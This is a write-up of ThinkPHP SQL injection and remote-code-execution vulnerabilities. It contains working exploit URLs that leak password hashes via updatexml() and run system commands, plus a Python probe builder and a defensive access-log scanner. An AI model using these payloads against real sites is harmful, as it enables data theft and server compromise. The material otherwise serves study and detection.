A roundup of the important CVEs disclosed in ThinkPHP over the last few years.
ThinkPHP 3.2.3
where injection
Add the following action to IndexController.class.php (only the method signature survives in the source; the body that feeds the id parameter into a model query is truncated):

```php
public function index(){
    // body truncated in the source
}
```

Visit http://localhost/tp3.2.3/index.php?id[where]=3 and 1=updatexml(1,concat(0x7e,(select password from user limit 1),0x7e),1)%23

Because id arrives as an array, its where element lands in the model's option list and is used verbatim as the WHERE clause; updatexml() then leaks the first password hash through the MySQL XPATH syntax error.
bind injection
Example (again only the signature survives in the source):

```php
public function index(){
    // body truncated in the source
}
```

Visit:
http://localhost/tp3.2.3/index.php?username=admin&passwrd=123&id[]=bind&id[]=1 and updatexml(1,concat(0x7e,(select password from user limit 1),0x7e),1)

Here id[]=bind selects the bind expression type in the where parser, which emits id = :1 and updatexml(...) without quoting; the :1 placeholder is satisfied by the bound update data (the username and passwrd fields), so the statement executes with the injected expression in place.
ThinkPHP 5.0.15
update/insert injection
Preconditions: app_debug is true (so the database error is echoed) and the controller passes the parameter to insert() or update().
Add to application/index/controller/Index.php (only the signature survives in the source):

```php
public function index()
{
    // body truncated in the source
}
```

Visit:
http://localhost/tp5.0.15/public/index.php?username[0]=inc&username[1]=updatexml(1,concat(0x7e,user(),0x7e),1)&username[2]=1

username[0]=inc makes the data parser treat the field as an arithmetic update and emit username+<second element> without casting the operand, so the updatexml() call in username[1] reaches MySQL unquoted; the later fix casts that operand with floatval().
ThinkPHP 5.1.22
order by injection
Preconditions: app_debug is true; 3.2.3 and earlier are affected as well.
Add to application/index/controller/Index.php (only the signature survives in the source):

```php
public function index()
{
    // body truncated in the source
}
```

Visit:
http://localhost/tp5.1.22/public/?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1

It is the array key of order, not its value, that is interpolated into ORDER BY: the builder wraps the key in backticks, so the backtick in the payload closes the column name, |updatexml(...) is evaluated as an expression, and # comments out the builder's closing backtick and the rest of the statement.
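All four probes above use the same error-based channel: updatexml() is handed an XPath that is deliberately malformed, MySQL copies the offending string into its error message, and debug mode echoes that message back. The Python script below is an added example, not code from the original write-up: it builds the four query strings the page uses, adds a substr() helper for values longer than the 31 characters a single error message can carry, and parses the leaked value back out of the error text. The base URLs and parameter names follow the PoCs; the HTTP responses are constructed.

```python
"""Error-based (updatexml) probes for the ThinkPHP injections above, plus a
parser that recovers the leaked value from the echoed MySQL error.
Added example, not from the original write-up: base URLs and parameter
names follow the PoCs, the HTTP responses are constructed."""
import re
from urllib.parse import urlencode, unquote_plus


def updatexml_probe(subquery, marker="0x7e"):
    """updatexml() raises "XPATH syntax error: '<xpath>'" whenever its second
    argument is not valid XPath.  Wrapping the subquery in a marker (0x7e = '~')
    guarantees the error and delimits the value.  MySQL keeps only the first
    32 characters of the bad XPath, so one probe leaks at most 31 of them."""
    return f"updatexml(1,concat({marker},({subquery}),{marker}),1)"


def chunked(subquery, start=1, width=31):
    """Wrap a subquery in substr() so longer values can be read 31 chars at a time."""
    return f"substr(({subquery}),{start},{width})"


def where_probe_url(base, subquery):
    # ThinkPHP 3.2.3: the value under id[where] is used verbatim as the WHERE clause
    query = urlencode({"id[where]": f"3 and 1={updatexml_probe(subquery)}#"})
    return f"{base}?{query}"


def bind_probe_url(base, subquery):
    # ThinkPHP 3.2.3: id[]=bind emits "id = :1 and ..." unquoted; the two data
    # fields supply the bound values that satisfy the :N placeholder
    params = [("username", "admin"), ("passwrd", "123"),
              ("id[]", "bind"), ("id[]", f"1 and {updatexml_probe(subquery)}")]
    return f"{base}?{urlencode(params)}"


def inc_probe_url(base, subquery):
    # ThinkPHP 5.0.15: username[0]=inc makes the data parser emit "username+<expr>"
    params = [("username[0]", "inc"),
              ("username[1]", updatexml_probe(subquery)),
              ("username[2]", "1")]
    return f"{base}?{urlencode(params)}"


def order_probe_url(base, subquery):
    # ThinkPHP 5.1.22: the array *key* of order[] is interpolated into ORDER BY;
    # the backtick closes the quoted column name and # comments out the rest
    key = f"order[id`|{updatexml_probe(subquery, marker='0x3a')}#]"
    return f"{base}?{urlencode({key: '1'})}"


def decoded_query(url):
    """Human-readable form of the query string (percent-encoding undone)."""
    return unquote_plus(url.split("?", 1)[1])


XPATH_ERR = re.compile(r"XPATH syntax error: '([^']*)'")


def extract_leak(body, marker="~"):
    """Return the text between the markers in an echoed MySQL error, or None.
    The closing marker is missing when the 32-character limit cut it off."""
    m = XPATH_ERR.search(body)
    if not m or not m.group(1).startswith(marker):
        return None
    value = m.group(1)[len(marker):]
    if value.endswith(marker):
        value = value[:-len(marker)]
    return value


# Constructed responses: what a debug-mode page echoes from PDO.  The first
# carries a 32-character md5 whose last character the limit cut off.
RESP_PASSWORD = ("SQLSTATE[HY000]: General error: 1105 XPATH syntax error: "
                 "'~e10adc3949ba59abbe56e057f20f883'")
RESP_USER = "SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~root@localhost~'"

if __name__ == "__main__":
    base = "http://localhost/tp3.2.3/index.php"
    print(decoded_query(where_probe_url(base, "select password from user limit 1")))
    # second chunk of the same value, starting at character 32
    print(decoded_query(where_probe_url(base, chunked("select password from user limit 1", 32))))
    print(extract_leak(RESP_PASSWORD), extract_leak(RESP_USER))
```

When the value you are after is longer than 31 characters, issue the probe once with chunked(..., 1) and again with chunked(..., 32) and concatenate the two extract_leak() results; a response whose closing marker is present tells you the chunk was complete.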
ThinkPHP below 5.0.23 and below 5.1.31 (remote code execution)
Vulnerable environment source:
https://github.com/vulnspy/thinkphp-5.1.29

The route parameter s is not checked against a controller-name whitelist, so a fully qualified class such as \think\app or \think\request can be named as the controller and any of its public methods called with attacker-supplied arguments. The first form below calls App::invokefunction(), which runs call_user_func_array('system', ['ls -l']); the second relies on Request::cache() splitting key on | and calling the right-hand side as a function on the left-hand side.

Execute a system command:
http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=ls%20-l|system

Run phpinfo:
http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=1|phpinfo

Write info.php:
http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php
http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E
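On the defensive side, every payload in this roundup has a recognisable shape in the web server's access log. The Python script below is an added example rather than code from the original page: it parses a few constructed combined-format log lines and tags the ThinkPHP-specific patterns, namely a controller segment in the s route that the patched 5.0.23 / 5.1.31 releases would reject (the whitelist regex ^[A-Za-z](\w|\.)*$ is my reading of that fix), error-based SQL functions in any parameter, the key=cmd|function form used against Request::cache(), and the [where], bind, inc/dec and order[...] array keys from the injection sections. The log lines and addresses are made up; the \x5C handling reflects how nginx escapes a raw backslash in $request.

```python
"""Tag ThinkPHP exploit shapes in web-server access logs.
Added example, not from the original page: the log lines are constructed
and the controller whitelist is my reading of the 5.0.23 / 5.1.31 fix."""
import re
from urllib.parse import urlsplit, parse_qsl

# request line inside a combined-format access log entry
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (?P<target>\S+) HTTP/')

# Controller names the patched releases accept; "\think\app" and
# "\think\request" fail it because of the backslashes (assumed regex).
CONTROLLER_OK = re.compile(r"[A-Za-z](\w|\.)*")

# MySQL functions that turn a SQL error into a data channel
ERROR_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)

# array-style parameter such as id[], id[0], username[2]
ARRAY_KEY = re.compile(r"\w+\[\d*\]")


def parse_request(line):
    """Return (path, [(key, value), ...]) with percent-decoding applied, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # nginx writes a raw backslash in $request as \x5C; undo that before decoding
    target = m.group("target").replace("\\x5C", "\\")
    parts = urlsplit(target)
    return parts.path, parse_qsl(parts.query, keep_blank_values=True)


def classify(line):
    """Return the sorted list of pattern tags that match one log line."""
    parsed = parse_request(line)
    if parsed is None:
        return []
    _path, params = parsed
    tags = set()
    for key, value in params:
        if key == "s":
            # PATHINFO route /module/controller/action; later segments are
            # key/value pairs and may legitimately be numeric, so only the
            # first three are held to the controller-name whitelist
            segs = [p for p in value.split("/") if p][:3]
            if any(not CONTROLLER_OK.fullmatch(seg) for seg in segs):
                tags.add("rce_controller_path")
        if ERROR_FUNCS.search(key) or ERROR_FUNCS.search(value):
            tags.add("error_based_sqli")
        if key.endswith("[where]"):
            tags.add("where_array_key")          # 3.2.3 id[where]=...
        if ARRAY_KEY.fullmatch(key):
            if value.lower() == "bind":
                tags.add("bind_injection")       # 3.2.3 id[]=bind
            elif value.lower() in ("inc", "dec"):
                tags.add("inc_dec_injection")    # 5.0.15 username[0]=inc
        if key.startswith("order[") and re.search(r"[`|(]", key):
            tags.add("orderby_key_injection")    # 5.1.22 order[id`|...]=1
        if key == "key" and "|" in value:
            tags.add("request_cache_pipe")       # \think\request/cache&key=cmd|system
    return sorted(tags)


def scan(lines):
    """(index, tags) for every line that matched at least one pattern."""
    hits = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits.append((i, tags))
    return hits


# Constructed log lines (combined format), one per PoC in the roundup
SAMPLE_LOG = [
    # benign request
    '10.0.0.5 - - [10/Dec/2018:14:03:11 +0800] "GET /public/index.php?s=/index/user/profile&id=3 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    # invokefunction call, backslashes percent-encoded by the client
    '10.0.0.9 - - [10/Dec/2018:14:03:12 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 200 412 "-" "curl/7.61.0"',
    # Request::cache variant, raw backslashes logged by nginx as \x5C
    '10.0.0.9 - - [10/Dec/2018:14:03:13 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Crequest/cache&key=ls%20-l|system HTTP/1.1" 200 412 "-" "curl/7.61.0"',
    # 3.2.3 where and bind probes
    '10.0.0.9 - - [10/Dec/2018:14:03:14 +0800] "GET /index.php?id[where]=3%20and%201=updatexml(1,concat(0x7e,(select%20password%20from%20user%20limit%201),0x7e),1)%23 HTTP/1.1" 500 1320 "-" "python-requests/2.20"',
    '10.0.0.9 - - [10/Dec/2018:14:03:15 +0800] "GET /index.php?username=admin&passwrd=123&id[]=bind&id[]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) HTTP/1.1" 500 1320 "-" "python-requests/2.20"',
    # 5.0.15 inc and 5.1.22 order-by key probes
    '10.0.0.9 - - [10/Dec/2018:14:03:16 +0800] "GET /public/index.php?username[0]=inc&username[1]=updatexml(1,concat(0x7e,user(),0x7e),1)&username[2]=1 HTTP/1.1" 500 1320 "-" "python-requests/2.20"',
    '10.0.0.9 - - [10/Dec/2018:14:03:17 +0800] "GET /public/?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1 HTTP/1.1" 500 1320 "-" "python-requests/2.20"',
]

if __name__ == "__main__":
    for i, tags in scan(SAMPLE_LOG):
        print(i, tags)
```

The controller check is the one worth keeping even after patching: a backslash in the s route never occurs in legitimate ThinkPHP traffic, so it is a low-noise indicator of scanners probing for this family regardless of which exact method name they try.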